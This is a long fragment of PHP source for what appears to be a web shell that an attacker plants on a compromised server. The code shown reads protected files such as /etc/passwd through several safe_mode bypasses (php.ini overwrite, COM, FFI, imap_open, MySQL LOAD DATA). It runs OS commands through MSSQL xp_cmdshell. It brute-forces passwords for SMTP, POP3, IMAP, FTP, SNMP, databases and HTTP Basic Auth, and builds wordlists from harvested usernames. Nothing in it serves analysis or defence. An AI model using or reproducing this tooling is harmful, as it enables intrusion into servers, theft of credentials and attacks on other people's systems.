                                                                                                                                    if (is_writable('.')) {
                                                                                                                                        echo "$pr$i:(php.ini$po";
                                                                                                                                        file_put_contents('php.ini', 'safe_mode = Off');
                                                                                                                                        readfile($file);
                                                                                                                                        unlink('php.ini');
                                                                                                                                        $i++;
                                                                                                                                    }
                                                                                                                                    if (extension_loaded('perl')) {
                                                                                                                                        echo "$pr$i:(perl$po";
                                                                                                                                        echo perlshelL("type \"$file\"");
                                                                                                                                        $i++;
                                                                                                                                    }
                                                                                                                                    if (is_object($ws = new COM('WScript.Shell'))) {
                                                                                                                                        echo "$pr$i:(COM$po";
                                                                                                                                        echo comshelL("type \"$file\"", $ws);
                                                                                                                                        $i++;
                                                                                                                                    }
                                                                                                                                    if (extension_loaded('ffi') && $windows) {
                                                                                                                                        echo "$pr$i:(FFI$po";
                                                                                                                                        echo ffishelL("type \"$file\"");
                                                                                                                                        $i++;
                                                                                                                                    }
                                                                                                                                    if (checkfunctioN('win_shell_execute')) {
                                                                                                                                        echo "$pr$i:(win32std$po";
                                                                                                                                        echo winshelL("type \"$file\"");
                                                                                                                                        $i++;
                                                                                                                                    }
                                                                                                                                    if (checkfunctioN('win32_create_service')) {
                                                                                                                                        echo "$pr$i:(win32service$po";
                                                                                                                                        echo srvshelL("type \"$file\"");
                                                                                                                                        $i++;
                                                                                                                                    }
                                                                                                                                    if (function_exists('imap_open')) {
                                                                                                                                        echo "$pr$i:(imap [A]$po";
                                                                                                                                        $str = imap_open('/etc/passwd', '', '');
                                                                                                                                        $list = imap_list($str, $file, '*');
                                                                                                                                        for ($i = 0;$i < count($list);$i++) echo $list[$i] . "
";
                                                                                                                                        imap_close($str);
                                                                                                                                        $i++;
                                                                                                                                        echo "$pr$i:(imap [B]$po";
                                                                                                                                        $str = imap_open($file, '', '');
                                                                                                                                        $tmp = imap_body($str, 1);
                                                                                                                                        echo $tmp;
                                                                                                                                        imap_close($str);
                                                                                                                                        $i++;
                                                                                                                                    }
                                                                                                                                    if ($file == '/etc/passwd') {
                                                                                                                                        echo "$pr$i:(posix$po";
                                                                                                                                        for ($uid = 0;$uid < 99999;$uid++) {
                                                                                                                                            $h = posix_getpwuid($uid);
                                                                                                                                            if (!empty($h)) foreach ($h as $v) echo "$v:";
                                                                                                                                            echo "
";
                                                                                                                                        }
                                                                                                                                    }
                                                                                                                                    echo "
</pre></font>";
                                                                                                                                } elseif (!empty($_REQUEST['show'])) {
                                                                                                                                    echo "<pre>$pr$i:(glob$po";
                                                                                                                                    $con = glob("$file*");
                                                                                                                                    foreach ($con as $v) echo "$v
";
                                                                                                                                    $i++;
                                                                                                                                    if (function_exists('imap_open')) {
                                                                                                                                        echo "$pr$i:(imap$po";
                                                                                                                                        $str = imap_open('/etc/passwd', '', '');
                                                                                                                                        $s = explode("|", $file);
                                                                                                                                        if (count($s) > 1) $list = imap_list($str, trim($s[0]), trim($s[1]));
                                                                                                                                        else $list = imap_list($str, trim($str[0]), '*');
                                                                                                                                        for ($i = 0;$i < count($list);$i++) echo "$list[$i]
";
                                                                                                                                        imap_close($str);
                                                                                                                                        $i++;
                                                                                                                                    }
                                                                                                                                    if (is_object($ws = new COM('WScript.Shell'))) {
                                                                                                                                        echo "$pr$i:(COM$po";
                                                                                                                                        $exec = comshelL("dir \"$file\"", $ws);
                                                                                                                                        $exec = str_replace("	", '', $exec);
                                                                                                                                        echo $exec;
                                                                                                                                        $i++;
                                                                                                                                    }
                                                                                                                                    if (checkfunctioN('win_shell_execute')) {
                                                                                                                                        echo "$pr$i:(win32std$po";
                                                                                                                                        echo winshelL("dir \"$file\"");
                                                                                                                                        $i++;
                                                                                                                                    }
                                                                                                                                    if (checkfunctioN('win32_create_service')) {
                                                                                                                                        echo "$pr$i:(win32service$po";
                                                                                                                                        echo srvshelL("dir \"$file\"");
                                                                                                                                        $i++;
                                                                                                                                    }
                                                                                                                                    echo "
</pre></font>";
                                                                                                                                } elseif (!empty($_REQUEST['sql'])) {
                                                                                                                                    $ta = uniqid('N');
                                                                                                                                    $s = array("CREATE TEMPORARY TABLE $ta (file LONGBLOB)", "LOAD DATA INFILE '" . addslashes($_REQUEST['file']) . "' INTO TABLE $ta", "SELECT * FROM $ta");
                                                                                                                                    $l = mysql_connect('localhost', $_REQUEST['user'], $_REQUEST['pass']);
                                                                                                                                    mysql_select_db($_REQUEST['db'], $l);
                                                                                                                                    echo '<pre><font color=blue>';
                                                                                                                                    foreach ($s as $v) {
                                                                                                                                        $q = mysql_query($v, $l);
                                                                                                                                        while ($d = mysql_fetch_row($q)) echo htmlspecialchars($d[0]);
                                                                                                                                    }
                                                                                                                                    echo '</pre></font>';
                                                                                                                                } elseif (!empty($_REQUEST['serveR']) && !empty($_REQUEST['coM']) && !empty($_REQUEST['dB']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS'])) {
                                                                                                                                    $res = '';
                                                                                                                                    $tb = uniqid('NJ');
                                                                                                                                    $db = mssql_connect($_REQUEST['serveR'], $_REQUEST['useR'], $_REQUEST['pasS']);
                                                                                                                                    mssql_select_db($_REQUEST['dB'], $db);
                                                                                                                                    mssql_query("create table $tb ( string VARCHAR (500) NULL)", $db);
                                                                                                                                    mssql_query("insert into $tb EXEC master.dbo.xp_cmdshell '" . $_REQUEST['coM'] . "'", $db);
                                                                                                                                    $re = mssql_query("select * from $tb", $db);
                                                                                                                                    while (($row = mssql_fetch_row($re))) {
                                                                                                                                        $res.= $row[0] . "
";
                                                                                                                                    }
                                                                                                                                    mssql_query("drop table $tb", $db);
                                                                                                                                    mssql_close($db);
                                                                                                                                    echo "<center><textarea rows='18' cols='64'>$res</textarea></center><br>";
                                                                                                                                }
                                                                                                                                $f = (!empty($_REQUEST['file'])) ? htmlspecialchars($_REQUEST['file']) : '/etc/passwd';
                                                                                                                                $u = (!empty($_REQUEST['user'])) ? htmlspecialchars($_REQUEST['user']) : 'root';
                                                                                                                                $p = (!empty($_REQUEST['pass'])) ? htmlspecialchars($_REQUEST['pass']) : '123456';
                                                                                                                                $d = (!empty($_REQUEST['db'])) ? htmlspecialchars($_REQUEST['db']) : 'test';
                                                                                                                                echo "<center>${t}Use PHP Bugs:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>File:</td><td bgcolor='#666666'><input type=text value='$f' name=file size=35></td></tr><tr><td bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit name=read value='Read File'><input class=buttons type=submit name=show value='Show directory'></form>$et<br>${t}Use MySQL:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>File:</td><td bgcolor='#666666'><input type=text value='$f' name=file size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Username:</td><td bgcolor='#808080'><input type=text name=user value='$u'></td></tr><tr><td width='20%' bgcolor='#666666'>Password:</td><td bgcolor='#666666'><input type=text name=pass value='$p'></td></tr><tr><td width='20%' bgcolor='#808080'>Database:</td><td bgcolor='#808080'><input type=text name=db value='$d'></td></tr><tr><td bgcolor='#666666'></td><td bgcolor='#666666' align=right>$hcwd<input class=buttons type=submit name=sql value='Read'></form>$et<br>${t}MSSQL Exec:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Server:</td><td bgcolor='#666666'><input type=text value='";
                                                                                                                                if (!empty($_REQUEST['serveR'])) echo htmlspecialchars($_REQUEST['serveR']);
                                                                                                                                else echo 'localhost';
                                                                                                                                echo "' name=serveR size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Username:</td><td bgcolor='#808080'><input type=text name=useR value='";
                                                                                                                                if (!empty($_REQUEST['useR'])) echo htmlspecialchars($_REQUEST['useR']);
                                                                                                                                else echo 'sa';
                                                                                                                                echo "' size=35></td></tr><tr><td width='20%' bgcolor='#666666'>Password:</td><td bgcolor='#666666'><input type=text name=pasS value='";
                                                                                                                                if (!empty($_REQUEST['pasS'])) echo htmlspecialchars($_REQUEST['pasS']);
                                                                                                                                echo "' size=35></td></tr><td width='20%' bgcolor='#808080'>Command:</td><td bgcolor='#808080'><input type=text name=coM value='";
                                                                                                                                if (!empty($_REQUEST['coM'])) echo htmlspecialchars($_REQUEST['coM']);
                                                                                                                                else echo 'dir c:';
                                                                                                                                echo "' size=35></td></tr><tr><td bgcolor='#666666'>Database:</td><td bgcolor='#666666'><input type=text name=dB value='";
                                                                                                                                if (isset($_REQUEST['dB'])) echo htmlspecialchars($_REQUEST['dB']);
                                                                                                                                else echo 'master';
                                                                                                                                echo "'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$hcwd<input class=buttons type=submit value='Execute'></form>$et</center>";
                                                                                                                            }
                                                                                                                            function crackeR() {
                                                                                                                                global $errorbox, $t, $et, $crack, $cwd;
                                                                                                                                $check = (!empty($_REQUEST['dictionary']) && !empty($_REQUEST['target'])) ? 1 : 0;
                                                                                                                                if (!empty($_REQUEST['cracK']) && !$check) {
                                                                                                                                    $c = htmlspecialchars($_REQUEST['cracK']);
                                                                                                                                    echo "<center>$t$c cracker:$crack";
                                                                                                                                } elseif (!empty($_REQUEST['cracK']) && $check) {
                                                                                                                                    $pro = strtolower($_REQUEST['cracK']) . 'checK';
                                                                                                                                    $target = $_REQUEST['target'];
                                                                                                                                    $type = $_REQUEST['combo'];
                                                                                                                                    $user = (!empty($_REQUEST['user'])) ? $_REQUEST['user'] : '';
                                                                                                                                    $dictionary = fopen($_REQUEST['dictionary'], 'r');
                                                                                                                                    if (isset($_REQUEST['loG']) && !empty($_REQUEST['logfilE'])) {
                                                                                                                                        $log = 1;
                                                                                                                                        $file = $_REQUEST['logfilE'];
                                                                                                                                    } else $log = 0;
                                                                                                                                    if ($dictionary) {
                                                                                                                                        echo '<font color=blue>Cracking ' . htmlspecialchars($target) . '...<br>';
                                                                                                                                        while (!feof($dictionary)) {
                                                                                                                                            if ($type) {
                                                                                                                                                $combo = trim(fgets($dictionary), " 

");
                                                                                                                                                $user = substr($combo, 0, strpos($combo, ':'));
                                                                                                                                                $pass = substr($combo, strpos($combo, ':') + 1);
                                                                                                                                            } else {
                                                                                                                                                $pass = trim(fgets($dictionary), " 

");
                                                                                                                                            }
                                                                                                                                            $ret = $pro($target, $user, $pass, 5);
                                                                                                                                            if ($ret == - 1) {
                                                                                                                                                echo "$errorbox Can not connect to server.$et";
                                                                                                                                                break;
                                                                                                                                            } else {
                                                                                                                                                if ($ret) {
                                                                                                                                                    $x = "U: $user P: $pass";
                                                                                                                                                    echo "$x<br>";
                                                                                                                                                    if ($log) file_add_contentS($file, "$x
");
                                                                                                                                                    if (!$type) break;
                                                                                                                                                }
                                                                                                                                            }
                                                                                                                                        }
                                                                                                                                        echo '<br>Done</font>';
                                                                                                                                        fclose($dictionary);
                                                                                                                                    } else {
                                                                                                                                        echo "$errorbox Can not open dictionary.$et";
                                                                                                                                    }
                                                                                                                                } else {
                                                                                                                                    echo "<center><table border=0 bgcolor=#333333><tr><td><a href='" . hlinK("seC=hc&workingdiR=$cwd") . "'>[Hash]</a> - <a href='" . hlinK("seC=cr&cracK=SMTP&workingdiR=$cwd") . "'>[SMTP]</a> - <a href='" . hlinK("seC=cr&cracK=POP3&workingdiR=$cwd") . "'>[POP3]</a> - <a href='" . hlinK("seC=cr&cracK=IMAP&workingdiR=$cwd") . "'>[IMAP]</a> - <a href='" . hlinK("seC=cr&cracK=FTP&workingdiR=$cwd") . "'>[FTP]</a> - <a href='" . hlinK("seC=snmp&workingdiR=$cwd") . "'>[SNMP]</a> - <a href='" . hlinK("seC=cr&cracK=MySQL&workingdiR=$cwd") . "'>[MySQL]</a> - <a href='" . hlinK("seC=cr&cracK=MSSQL&workingdiR=$cwd") . "'>[MSSQL]</a> - <a href='" . hlinK("seC=fcr&workingdiR=$cwd") . "'>[HTTP Form]</a> - <a href='" . hlinK("seC=auth&workingdiR=$cwd") . "'>[HTTP Auth(basic)]</a> - <a href='" . hlinK("seC=dic&workingdiR=$cwd") . "'>[Dictionary maker]</a>$et</center>";
                                                                                                                                }
                                                                                                                            }
                                                                                                                            function snmpcrackeR() {
                                                                                                                                global $t, $et, $errorbox, $hcwd;
                                                                                                                                if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])) {
                                                                                                                                    $target = $_REQUEST['target'];
                                                                                                                                    if (isset($_REQUEST['loG']) && !empty($_REQUEST['logfilE'])) {
                                                                                                                                        $log = 1;
                                                                                                                                        $file = $_REQUEST['logfilE'];
                                                                                                                                    } else $log = 0;
                                                                                                                                    $dictionary = fopen($_REQUEST['dictionary'], 'r');
                                                                                                                                    if ($dictionary) {
                                                                                                                                        echo '<font color=blue>Cracking ' . htmlspecialchars($target) . '...<br>';
                                                                                                                                        while (!feof($dictionary)) {
                                                                                                                                            $com = trim(fgets($dictionary), " 

");
                                                                                                                                            $res = snmpchecK($target, $com, 2);
                                                                                                                                            if ($res) {
                                                                                                                                                echo "$com<br>";
                                                                                                                                                if ($log) file_add_contentS($file, "$com
");
                                                                                                                                            }
                                                                                                                                        }
                                                                                                                                        echo '<br>Done</font>';
                                                                                                                                        fclose($dictionary);
                                                                                                                                    } else {
                                                                                                                                        echo "$errorbox Can not open dictionary.$et";
                                                                                                                                    }
                                                                                                                                } else echo "<center>${t}SNMP cracker:</td><td bgcolor='#333333'></td></tr><form method='POST'>$hcwd<tr><td width='20%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666'><input type=text name=dictionary size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Server:</td><td bgcolor='#808080'><input type=text name=target size=35></td></tr><tr><td width='20%' bgcolor='#666666'><input type=checkbox name=loG value=1 onClick='document.form.logfilE.disabled = !document.form.logfilE.disabled;' style='border-width:1px;background-color:#666666;' checked>Log</td><td bgcolor='#666666'><input type=text name=logfilE size=25 value='" . whereistmP() . DIRECTORY_SEPARATOR . ".log'> <input class=buttons type=submit value=Start></form>$et</center>";
                                                                                                                            }
                                                                                                                            function dicmakeR() {
                                                                                                                                global $errorbox, $windows, $footer, $t, $et, $hcwd;
                                                                                                                                $combo = (empty($_REQUEST['combo'])) ? 0 : 1;
                                                                                                                                if (!empty($_REQUEST['range']) && !empty($_REQUEST['output']) && !empty($_REQUEST['min']) && !empty($_REQUEST['max'])) {
                                                                                                                                    $min = $_REQUEST['min'];
                                                                                                                                    $max = $_REQUEST['max'];
                                                                                                                                    if ($max < $min) die($errorbox . "Bad input!$et" . $footer);
                                                                                                                                    $s = $w = '';
                                                                                                                                    $out = $_REQUEST['output'];
                                                                                                                                    $r = $_REQUEST['range'];
                                                                                                                                    $dic = fopen($out, 'w');
                                                                                                                                    if ($r == 1) {
                                                                                                                                        for ($s = pow(10, $min - 1);$s < pow(10, $max - 1);$s++) {
                                                                                                                                            $w = $s;
                                                                                                                                            if ($combo) $w = "$w:$w";
                                                                                                                                            fwrite($dic, $w . "
");
                                                                                                                                        }
                                                                                                                                    } else {
                                                                                                                                        $s = str_repeat($r, $min);
                                                                                                                                        while (strlen($s) < $max) {
                                                                                                                                            $w = $s;
                                                                                                                                            if ($combo) $w = "$w:$w";
                                                                                                                                            fwrite($dic, $w . "
");
                                                                                                                                            $s++;
                                                                                                                                        }
                                                                                                                                    }
                                                                                                                                    fclose($dic);
                                                                                                                                    echo '<font color=blue>Done</font>';
                                                                                                                                } elseif (!empty($_REQUEST['input']) && !empty($_REQUEST['output'])) {
                                                                                                                                    $input = fopen($_REQUEST['input'], 'r');
                                                                                                                                    if (!$input) {
                                                                                                                                        if ($windows) echo $errorbox . 'Unable to read from ' . htmlspecialchars($_REQUEST['input']) . "$et<br>";
                                                                                                                                        else {
                                                                                                                                            $input = explode("
", shelL("cat $input"));
                                                                                                                                            $output = fopen($_REQUEST['output'], 'w');
                                                                                                                                            if ($output) {
                                                                                                                                                foreach ($input as $in) {
                                                                                                                                                    $user = $in;
                                                                                                                                                    $user = trim(fgets($in), " 

");
                                                                                                                                                    if (!strstr($user, ':')) continue;
                                                                                                                                                    $user = substr($user, 0, (strpos($user, ':')));
                                                                                                                                                    if ($combo) fwrite($output, $user . ':' . $user . "
");
                                                                                                                                                    else fwrite($output, $user . "
");
                                                                                                                                                }
                                                                                                                                                fclose($input);
                                                                                                                                                fclose($output);
                                                                                                                                                echo '<font color=blue>Done</font>';
                                                                                                                                            }
                                                                                                                                        }
                                                                                                                                    } else {
                                                                                                                                        $output = fopen($_REQUEST['output'], 'w');
                                                                                                                                        if ($output) {
                                                                                                                                            while (!feof($input)) {
                                                                                                                                                $user = trim(fgets($input), " 

");
                                                                                                                                                if (!strstr($user, ':')) continue;
                                                                                                                                                $user = substr($user, 0, (strpos($user, ':')));
                                                                                                                                                if ($combo) fwrite($output, $user . ':' . $user . "
");
                                                                                                                                                else fwrite($output, $user . "
");
                                                                                                                                            }
                                                                                                                                            fclose($input);
                                                                                                                                            fclose($output);
                                                                                                                                            echo '<font color=blue>Done</font>';
                                                                                                                                        } else echo $errorbox . ' Unable to write data to ' . htmlspecialchars($_REQUEST['input']) . "$et<br>";
                                                                                                                                    }
                                                                                                                                } elseif (!empty($_REQUEST['url']) && !empty($_REQUEST['output'])) {
                                                                                                                                    $res = downloadiT($_REQUEST['url'], $_REQUEST['output']);
                                                                                                                                    if ($combo && $res) {
                                                                                                                                        $file = file($_REQUEST['output']);
                                                                                                                                        $output = fopen($_REQUEST['output'], 'w');
                                                                                                                                        foreach ($file as $v) fwrite($output, "$v:$v
");
                                                                                                                                        fclose($output);
                                                                                                                                    }
                                                                                                                                    echo '<font color=blue>Done</font>';
                                                                                                                                } else {
                                                                                                                                    $temp = whereistmP() . DIRECTORY_SEPARATOR;
                                                                                                                                    echo "<center>${t}Wordlist generator:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Range:</td><td bgcolor='#666666'><select name=range><option value=a>a-z</option><option value=A>A-Z</option><option value=1>0-9</option></select></td></tr><tr><td width='20%' bgcolor='#808080'>Min lenght:</td><td bgcolor='#808080'><select name=min><option value=1>1</option><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8>8</option><option value=9>9</option><option value=10>10</option></select></td></tr><tr><td width='20%' bgcolor='#666666'>Max lenght:</td><td bgcolor='#666666'><select name=max><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8 selected>8</option><option value=9>9</option><option value=10>10</option><option value=11>11</option><option value=12>12</option><option value=13>13</option><option value=14>14</option><option value=15>15</option></select></td></tr><tr><td width='20%' bgcolor='#808080'>Output:</td><td bgcolor='#808080'><input type=text value='$temp.dic' name=output size=35></td></tr><tr><td width='20%' bgcolor='#666666'></td><td bgcolor='#666666'><input type=checkbox name=combo style='border-width:1px;background-color:#666666;' value=1 checked>Combo style output</td></tr><td bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit value=Make></form>$et<br>${t}Grab dictionary:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Grab from:</td><td bgcolor='#666666'><input type=text value='/etc/passwd' name=input size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Output:</td><td bgcolor='#808080'><input type=text value='$temp.dic' name=output size=35></td></tr><tr><td width='20%' bgcolor='#666666'></td><td bgcolor='#666666'><input type=checkbox style='border-width:1px;background-color:#666666;' name=combo value=1 checked>Combo style output</td></tr><td bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit value=Grab></form>$et<br>${t}Download dictionary:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>URL:</td><td bgcolor='#666666'><input type=text value='http://vburton.ncsa.uiuc.edu/wordlist.txt' name=url size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Output:</td><td bgcolor='#808080'><input type=text value='$temp.dic' name=output size=35></td></tr><tr><td width='20%' bgcolor='#666666'></td><td bgcolor='#666666'><input type=checkbox style='border-width:1px;background-color:#666666;' name=combo value=1 checked>Combo style output</td></tr><tr><td bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit value=Get></form>$et</center>";
                                                                                                                                }
                                                                                                                            }
                                                                                                                            function ftpclienT() {
                                                                                                                                global $t, $cwd, $hcwd, $errorbox, $et;
                                                                                                                                $td = "<td bgcolor='#333333' width='50%'>";
                                                                                                                                if (!empty($_REQUEST['hosT']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && function_exists('ftp_connect')) {
                                                                                                                                    $user = $_REQUEST['useR'];
                                                                                                                                    $pass = $_REQUEST['pasS'];
                                                                                                                                    $host = $_REQUEST['hosT'];
                                                                                                                                    $con = ftp_connect($_REQUEST['hosT'], 21, 10);
                                                                                                                                    if ($con) {
                                                                                                                                        $ftp = ftp_login($con, $user, $pass);
                                                                                                                                        if ($ftp) {
                                                                                                                                            if (!empty($_REQUEST['PWD'])) ftp_chdir($con, $_REQUEST['PWD']);
                                                                                                                                            if (!empty($_REQUEST['filE'])) {
                                                                                                                                                $file = $_REQUEST['filE'];
                                                                                                                                                $mode = (isset($_REQUEST['modE'])) ? FTP_BINARY : FTP_ASCII;
                                                                                                                                                if (isset($_REQUEST['geT'])) ftp_get($con, $file, $file, $mode);
                                                                                                                                                elseif (isset($_REQUEST['puT'])) ftp_put($con, $file, $file, $mode);
                                                                                                                                                elseif (isset($_REQUEST['rM'])) {
                                                                                                                                                    ftp_rmdir($con, $file);
                                                                                                                                                    ftp_delete($con, $file);
                                                                                                                                                } elseif (isset($_REQUEST['mD'])) ftp_mkdir($con, $file);
                                                                                                                                            }
                                                                                                                                            $pwd = ftp_pwd($con);
                                                                                                                                            $dir = ftp_nlist($con, '');
                                                                                                                                            $d = opendir($cwd);
                                                                                                                                            echo "<table border=0 style='border-collapse: collapse' width='100%'><tr>${td}Server:</td>${td}Client:</td></tr><form method=POST><tr>$td<input type=text value='$pwd' name=PWD size=50><input value=Change class=buttons type=submit></td>$td<input size=50 type=text value='$cwd' name=workingdiR><input value=Change class=buttons type=submit></td></tr><tr>$td";
                                                                                                                                            foreach ($dir as $n) echo "$n<br>";
                                                                                                                                            echo "</td>$td";
                                                                                                                                            while ($cdir = readdir($d)) if ($cdir != '.' && $cdir != '..') echo "$cdir<br>";
                                                                                                                                            echo "</td></tr><tr>${td}Name:<input type=text name=filE><input type=checkbox style='border-width:1px;background-color:#333333;' name=modE value=1>Binary <input type=submit name=geT class=buttons value=Get><input type=submit name=puT class=buttons value=Put><input type=submit name=rM class=buttons value=Remove><input type=submit name=mD class=buttons value='Make dir'></td>$td<input type=hidden value='$user' name=useR><input type=hidden value='$pass' name=pasS><input type=hidden value='$host' name=hosT></form>$et";
                                                                                                                                        } else echo "$errorbox Wrong username or password$et";
                                                                                                                                    } else echo "$errorbox Can not connect to server!$et";
                                                                                                                                } else {
                                                                                                                                    echo "<center>${t}FTP cilent:</td><form name=client method='POST'><td bgcolor='#333333'></td></tr><tr><td width='20%' bgcolor='#666666'>Server:</td><td bgcolor='#666666'><input type=text value=localhost name=hosT size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Username:</td><td bgcolor='#808080'><input type=text name=useR value=anonymous size=35></td><tr><td width='20%' bgcolor='#666666'>Password:</td><td bgcolor='#666666'><input type=text [email protected] name=pasS size=35></td></tr><tr><td width='20%' bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit value=Connect></form>$et</center>";
                                                                                                                                }
                                                                                                                            }
                                                                                                                            function calC() {
                                                                                                                                global $t, $et, $hcwd;
                                                                                                                                $fu = array('-', 'md5', 'sha1', 'crc32', 'hex', 'ip2long', 'decbin', 'dechex', 'hexdec', 'bindec', 'long2ip', 'base64_encode', 'base64_decode', 'urldecode', 'urlencode', 'des', 'strrev');
                                                                                                                                if (!empty($_REQUEST['input']) && (in_array($_REQUEST['to'], $fu))) {
                                                                                                                                    $to = $_REQUEST['to'];
                                                                                                                                    echo "<center>${t}Output:<br><textarea rows='10' cols='64'>";
                                                                                                                                    if ($to == 'hex') for ($i = 0;$i < strlen($_REQUEST['input']);$i++) echo '%' . strtoupper(dechex(ord($_REQUEST['input'] {
                                                                                                                                        $i
                                                                                                                                    })));
                                                                                                                                    else echo $to($_REQUEST['input']);
                                                                                                                                    echo "</textarea>$et</center><br>";
                                                                                                                                }
                                                                                                                                echo "<center>${t}Convertor:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Input:</td><td bgcolor='#666666'><textarea rows='10' name='input' cols='64'>";
                                                                                                                                if (!empty($_REQUEST['input'])) echo htmlspecialchars($_REQUEST['input']);
                                                                                                                                echo "</textarea></td></tr><tr><td width='20%' bgcolor='#808080'>Task:</td><td bgcolor='#808080'><select size=1 name=to><option value=md5>MD5</option><option value=sha1>SHA1</option><option value=crc32>Crc32</option><option value=strrev>Reverse</option><option value=ip2long>IP to long</option><option value=long2ip>Long to IP</option><option value=decbin>Decimal to binary</option><option value=bindec>Binary to decimal</option><option value=dechex>Decimal to hex</option><option value=hexdec>Hex to decimal</option><option value=hex>ASCII to hex</option><option value=urlencode>URL encoding</option><option value=urldecode>URL decoding</option><option value=base64_encode>Base64 encoding</option><option value=base64_decode>Base64 decoding</option></select></td><tr><td width='20%' bgcolor='#666666'></td><td bgcolor='#666666' align=right><input class=buttons type=submit value=Convert>$hcwd</form>$et</center>";
                                                                                                                            }
                                                                                                                            function authcrackeR() {
                                                                                                                                global $errorbox, $et, $t, $hcwd;
                                                                                                                                if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])) {
                                                                                                                                    if (isset($_REQUEST['loG']) && !empty($_REQUEST['logfilE'])) {
                                                                                                                                        $log = 1;
                                                                                                                                        $file = $_REQUEST['logfilE'];
                                                                                                                                    } else $log = 0;
                                                                                                                                    $data = '';
                                                                                                                                    $method = ($_REQUEST['method']) ? 'POST' : 'GET';
                                                                                                                                    if (strstr($_REQUEST['target'], '?')) {
                                                                                                                                        $data = substr($_REQUEST['target'], strpos($_REQUEST['target'], '?') + 1);
                                                                                                                                        $_REQUEST['target'] = substr($_REQUEST['target'], 0, strpos($_REQUEST['target'], '?'));
                                                                                                                                    }
                                                                                                                                    spliturL($_REQUEST['target'], $host, $page);
                                                                                                                                    $type = $_REQUEST['combo'];
                                                                                                                                    $user = (!empty($_REQUEST['user'])) ? $_REQUEST['user'] : '';
                                                                                                                                    if ($method == 'GET') $page.= $data;
                                                                                                                                    $dictionary = fopen($_REQUEST['dictionary'], 'r');
                                                                                                                                    echo '<font color=blue>';
                                                                                                                                    while (!feof($dictionary)) {
                                                                                                                                        if ($type) {
                                                                                                                                            $combo = trim(fgets($dictionary), " 

");
                                                                                                                                            $user = substr($combo, 0, strpos($combo, ':'));
                                                                                                                                            $pass = substr($combo, strpos($combo, ':') + 1);
                                                                                                                                        } else {
                                                                                                                                            $pass = trim(fgets($dictionary), " 

");
                                                                                                                                        }
                                                                                                                                        $so = fsockopen($host, 80, $en, $es, 5);
                                                                                                                                        if (!$so) {
                                                                                                                                            echo "$errorbox Can not connect to host$et";
                                                                                                                                            break;
                                                                                                                                        } else {
                                                                                                                                            $packet = "$method /$page HTTP/1.0
Accept-Encoding: text
Host: $host
Referer: $host
Connection: Close
Authorization: Basic " . base64_encode("$user:$pass");
                                                                                                                                            if ($method == 'POST') $packet.= 'Content-Type: application/x-www-form-urlencoded
Content-Length: ' . strlen($data);
                                                                                                                                            $packet.= "

";
                                                                                                                                            $packet.= $data;
                                                                                                                                            fputs($so, $packet);
                                                                                                                                            $res = substr(fgets($so), 9, 2);
                                                                                                                                            fclose($so);
                                                                                                                                            if ($res == '20') {
                                                                                                                                                echo "U: $user P: $pass</br>";
                                                                                                                                                if ($log) file_add_contentS($file, "U: $user P: $pass
");
                                                                                                                                            }
                                                                                                                                        }
                                                                                                                                    }
                                                                                                                                    echo 'Done!</font>';
                                                                                                                                } else echo "<center><form method='POST' name=form>${t}HTTP Auth cracker:</td><td bgcolor='#333333'><select name=method><option value=1>POST</option><option value=0>GET</option></select></td></tr><tr><td width='20%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666'><input type=text name=dictionary size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Dictionary type:</td><td bgcolor='#808080'><input type=radio name=combo checked value=0 onClick='document.form.user.disabled = false;' style='border-width:1px;background-color:#808080;'>Simple (P)<input type=radio value=1 name=combo onClick='document.form.user.disabled = true;' style='border-width:1px;background-color:#808080;'>Combo (U:P)</td></tr><tr><td width='20%' bgcolor='#666666'>Username:</td><td bgcolor='#666666'><input type=text size=35 value=root name=user></td></tr><tr><td width='20%' bgcolor='#808080'>Server:</td><td bgcolor='#808080'><input type=text name=target value=localhost size=35></td></tr><tr><td width='20%' bgcolor='#666666'><input type=checkbox name=loG value=1 onClick='document.form.logfilE.disabled = !document.form.logfilE.disabled;' style='border-width:1px;background-color:#666666;' checked>Log</td><td bgcolor='#666666'><input type=text name=logfilE size=25 value='" . whereistmP() . DIRECTORY_SEPARATOR . ".log'> $hcwd <input class=buttons type=submit value=Start></form>$et</center>";
                                                                                                                            }
                                                                                                                            function openiT($name) {
                                                                                                                                $ext = strtolower(substr($name, strrpos($name, '.') + 1));
                                                                                                                                $src = array('php', 'php3', 'php4', 'phps', 'phtml', 'phtm', 'inc');
                                                                                                                                if (in_array($ext, $src)) highlight_file($name);
                                                                                                                                else echo '<font color=blue><pre>' . htmlspecialchars(file_get_contents($name)) . '</pre></font>';
                                                                                                                            }
                                                                                                                            function opensesS($name) {
                                                                                                                                $sess = file_get_contents($name);
                                                                                                                                $var = explode(';', $sess);
